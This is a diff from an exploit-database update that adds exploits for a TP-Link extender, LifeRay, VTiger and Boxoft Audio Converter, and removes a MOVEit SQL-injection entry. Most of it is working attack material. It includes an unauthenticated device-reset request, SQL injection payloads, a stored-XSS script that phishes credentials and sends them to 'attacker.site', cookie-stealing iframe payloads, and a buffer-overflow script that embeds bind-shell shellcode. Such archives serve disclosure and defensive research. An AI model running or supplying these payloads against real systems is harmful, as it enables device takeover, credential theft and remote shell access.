DB: 2020-11-24

6 changes to exploits/shellcodes

Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)

MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection

MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
VTiger v7.0 CRM - 'To' Persistent XSS
LifeRay 7.2.1 GA2 - Stored XSS

exploits/hardware/webapps/49092.txt

@@ -0,0 +1,28 @@
+# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
+# Date: 2020/07/29
+# Exploit Author: malwrforensics
+# Vendor Homepage: https://tp-link.com
+# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
+# Version: TL-WA855RE(US)_V5_200415
+# Tested on: N/A
+# CVE : 2020-24363 
+Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware
+
+Details
+By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.
+To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.
+
+POST /?code=5&asyn=0 HTTP/1.1
+Host: <redacted>
+Content-Length: 7
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0
+Content-Type: text/plain;charset=UTF-8
+Origin: http://<redacted>
+Referer: http://<redacted>
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+0|1,0,0

exploits/multiple/webapps/48855.txt

@@ -1,34 +0,0 @@
-# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
-# Google Dork: inurl:human.aspx intext:moveit
-# Date: 2020-10-05
-# Exploit Author: Aviv Beniash
-# Vendor Homepage: https://www.ipswitch.com/
-# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
-# CVE : CVE-2019-16383
-# 
-# Related Resources:
-# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
-# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
-
-# Description:
-# The API call for revoking logon tokens is vulnerable to a
-# Time based blind SQL injection via the 'token' parameter
-
-# MSSQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 32
-
-token='; WAITFOR DELAY '0:0:10'--
-
-
-# MySQL payload:
-
-POST /api/v1/token/revoke HTTP/1.1
-Host: moveittransferstg
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 21
-
-token=' OR SLEEP(10);

exploits/multiple/webapps/49091.txt

@@ -0,0 +1,31 @@
+# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
+# Date: 10/05/2020 
+# Exploit Author: 3ndG4me
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://www.liferay.com/
+# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
+# Tested on: Debian Linux
+# CVE : CVE-2020-7934
+# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+# NOTE: The attached proof of concept is a javascript payload,
+submitted as a ".txt" file to attach via email as ".js" is often
+blocked.
+
+// CVE-2020-7934 Cred Phishing Example Attack
+// Author: 3ndG4me
+// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
+
+// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
+// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
+
+var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
+var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
+
+
+console.log(email);
+console.log(password);
+
+var url = "http://attacker.site/" + email + ":" + password;
+
+$.get(url);

exploits/php/webapps/49090.txt

@@ -0,0 +1,282 @@
+# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
+# Date: 2020-11-18
+# Exploit Vulnerability-Lab
+# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
+# Software Link: https://sourceforge.net/projects/vtigercrm/files/
+# Version: v7.0
+
+Document Title:
+===============
+VTiger v7.0 CRM - (To) Persistent Email Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2227
+
+
+Release Date:
+=============
+2020-11-18
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2227
+
+
+Common Vulnerability Scoring System:
+====================================
+4.8
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Vtiger CRM is web-application built using PHP. Choose the best CRM for
+your business. Custom Module & Relationship builder for
+VTiger is a very useful extension that allows crm administrators to
+create custom modules within few clicks. All custom modules
+are created following strict VTiger standards. In addition, the
+relationship builder allows crm admin to link together existing modules
+as well as new custom modules.
+
+(Copy of the Homepage:
+https://www.vtiger.com/open-source-crm/download-open-source/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
+
+
+Affected Product(s):
+====================
+VTExperts
+Product: VTiger v7.0 - CRM (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-27: Public Disclosure (Vulnerability Laboratory)
+2020-04-28: Researcher Notification & Coordination (Security Researcher)
+2020-04-29: Vendor Notification 1 (Security Department)
+2020-05-30: Vendor Notification 2 (Security Department)
+2020-06-22: Vendor Notification 3 (Security Department)
+****-**-**: Vendor Response/Feedback (Security Department)
+****-**-**: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-18: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official VTiger v7.0 CRM open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent cross site scripting web vulnerability is located in the
+`searchValue` Parameter of the `Emails Compose` module.
+Attackers are able to inject own mlicious script code in the `To` sender
+input field of the email compose module to attack other
+user accounts. The email can be delivered with multiple receipients
+which allows an attacker to insert the target email and a
+malicious payload. The request method to inject is GET via searchValue
+and POST on compose with persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+[+] GET
+
+Vulnerable Module(s):
+[+] Email Compose (index.php?module=Emails)
+
+Vulnerable Input(s):
+[+] To (Sender - Email)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by
+remote attackers with low privileged account and with low user interaction.
+For security demonstration or to reproduce the cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Url
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the web-application ui
+2. Login with a regular user role to the ui
+3. Open vendors and move to compose to email form
+4. Inject malicious payload as "to" sender information and as well a
+valid email to target
+5. Send the request after the compose
+6. Wait until the administrator or higher privileged targeted users
+click in the email or receives the email on preview
+7. Successful reproduce of the cross site scripting web vulnerability!
+
+
+PoC: Vulnerable Source (Execution Point)
+<div class="col-lg-12"><div class="col-lg-2"><span
+class="pull-right">To&nbsp;<span class="redColor">*</span></span></div>
+<div class="col-lg-6"><div class="select2-container
+select2-container-multi autoComplete sourceField select2"
+id="s2id_emailField" style="width: 100%;"><ul class="select2-choices
+ui-sortable">  <li class="select2-search-choice">
+<div>IT <b>(test@test.com)</b></div>    <a href="#"
+class="select2-search-choice-close" tabindex="-1"></a></li>
+<li class="select2-search-choice"><div><iframe src"evil.source"
+onload=alert(document.cookie)></div></iframe></div>
+
+
+--- PoC Session Logs [GET] ---
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
+Host: localhost:8080
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10 (Debian)
+Content-Length: 28
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+-
+Content-Type: text/json; charset=UTF-8
+http://localhost:8080/vtigercrm/evil.source
+Host: localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
+Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.10
+Content-Length: 299
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=iso-8859-1
+
+
+Reference(s):
+http://localhost:8080/vtigercrm/
+http://localhost:8080/vtigercrm/index.php
+http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=
+
+
+Security Risk:
+==============
+The security risk of the persistent web vulnerability i the
+web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com

exploits/windows/local/49089.py

@@ -0,0 +1,55 @@
+# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-11-22
+# Vendor Homepage: http://www.boxoft.com/
+# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
+# Tested Version: 2.3.0
+# Vulnerability Type: Local Buffer Overflow (SEH)
+# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
+ 
+# Steps to Produce the Local Buffer Overflow (SEH): 
+# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
+# 2.- Open AudioConvert.exe
+# 3.- Try
+# 4.- Batch Convert Mode -> Next
+# 5.- Add
+# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
+# 7.- Port 4444 open
+ 
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+
+#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
+
+shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
+"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
+"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
+"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
+"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
+"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
+"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
+"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
+"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
+"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
+"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
+"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
+"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
+"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
+"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
+"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
+"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
+"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
+"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
+"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
+"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
+"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
+"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")
+
+nSEH = "\xeb\x06\x90\x90"
+SEH = "\xB8\x68\x40\x00" #AudioConvert.exe
+ 
+buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode
+f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -11204,6 +11204,7 @@ id,file,description,date,author,type,platform,port
 49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
 49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
+49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42984,7 +42985,7 @@ id,file,description,date,author,type,platform,port
 48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
 48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
 48315,exploits/php/webapps/48315.txt,"WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
-48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Aviv Beniash",webapps,php,
 48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
 48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
 48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
@@ -43204,7 +43205,7 @@ id,file,description,date,author,type,platform,port
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
 48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
 48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
-48855,exploits/multiple/webapps/48855.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-10-05,"Aviv Beniash",webapps,multiple,
+49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,
 48856,exploits/php/webapps/48856.py,"SpamTitan 7.07 - Unauthenticated Remote Code Execution",2020-10-05,"Felipe Molina",webapps,php,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
@@ -43316,3 +43317,5 @@ id,file,description,date,author,type,platform,port
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
 49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
+49090,exploits/php/webapps/49090.txt,"VTiger v7.0 CRM - 'To' Persistent XSS",2020-11-23,Vulnerability-Lab,webapps,php,
+49091,exploits/multiple/webapps/49091.txt,"LifeRay 7.2.1 GA2 - Stored XSS",2020-11-23,3ndG4me,webapps,multiple,